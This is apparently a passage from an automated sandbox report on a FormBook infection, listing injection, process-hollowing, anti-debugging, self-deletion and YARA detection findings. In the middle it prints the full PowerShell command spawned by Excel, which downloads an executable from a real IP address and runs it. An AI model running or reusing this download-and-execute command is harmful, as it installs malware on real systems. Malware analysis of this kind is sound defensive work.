            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033823E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033823E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033823E3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033053C5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033553CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033553CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D4A20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D4A20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03391229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D8239 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D8239 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D8239 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03314A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03314A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032E8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032DAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032DAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0331927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0338B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0338B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03315A69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03315A69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03315A69 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03364257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03391A5F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03395A4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03395A4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03395A4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03395A4F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D1AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033012BD mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033012BD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033012BD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03305AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03305AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032EAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032EAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339129A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330DA88 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330DA88 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339B2E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339B2E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339B2E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339B2E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03302AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D3ACA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A8ADD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D5AC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D5AC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D5AC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D12D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03302ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0330513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D3138 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032E0100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032E0100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032E0100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032DC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339E962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032DB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032DB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033A8966 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03391951 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D395E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032D395E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033551BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033099BC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033061A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033061A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F99BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F99BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F99BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032F99BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033569A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033949A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033949A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033949A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_033949A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03302990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_03304190 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_032FC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 19_2_0339A189 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\Public\eVJOpc.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
            Source: C:\Users\Public\eVJOpc.exeCode function: 9_2_00409B50 LdrLoadDll,

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\Public\eVJOpc.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: DA0000
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\Public\eVJOpc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\Public\eVJOpc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
            Source: C:\Users\Public\eVJOpc.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\Public\eVJOpc.exeMemory written: C:\Users\Public\eVJOpc.exe base: 400000 value starts with: 4D5A
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\Public\eVJOpc.exeThread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\Public\eVJOpc.exeThread register set: target process: 3352
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
            Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
            Source: Yara matchFile source: app.xml, type: SAMPLE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\explorer.exe 'C:\Windows\system32\explorer.exe' C:\Users\Public\eVJOpc.exe
            Source: C:\Users\Public\eVJOpc.exeProcess created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe'
            Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\eVJOpc.exe'
            Source: explorer.exe, 00000007.00000002.561411411.0000000000FA0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.375021132.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 0000000A.00000002.559932711.0000000000B68000.00000004.00000020.sdmpBinary or memory string: Progman\Pr
            Source: explorer.exe, 00000007.00000002.561411411.0000000000FA0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.375021132.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000002.561411411.0000000000FA0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.375021132.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000007.00000002.561411411.0000000000FA0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.375021132.00000000011E0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 0000000A.00000000.402916350.0000000008778000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndh
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
            Source: C:\Users\Public\eVJOpc.exeCode function: 8_2_10004030 GetProcessHeap,HeapAlloc,GetUserNameW,lstrcmpW,GetProcessHeap,HeapFree,
            Source: explorer.exe, 0000000A.00000000.397828663.00000000047D0000.00000004.00000001.sdmpBinary or memory string: \\192.168.2.1\all\procexp.exe
            Source: explorer.exe, 0000000A.00000000.402916350.0000000008778000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Windows Defender\MSASCui.exe
            Source: explorer.exe, 0000000A.00000000.397828663.00000000047D0000.00000004.00000001.sdmpBinary or memory string: "c:\users\user\desktop\procexp.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.eVJOpc.exe.f040000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.452707003.00000000009E0000.00000040.00020000.sdmp, type: MEMORY
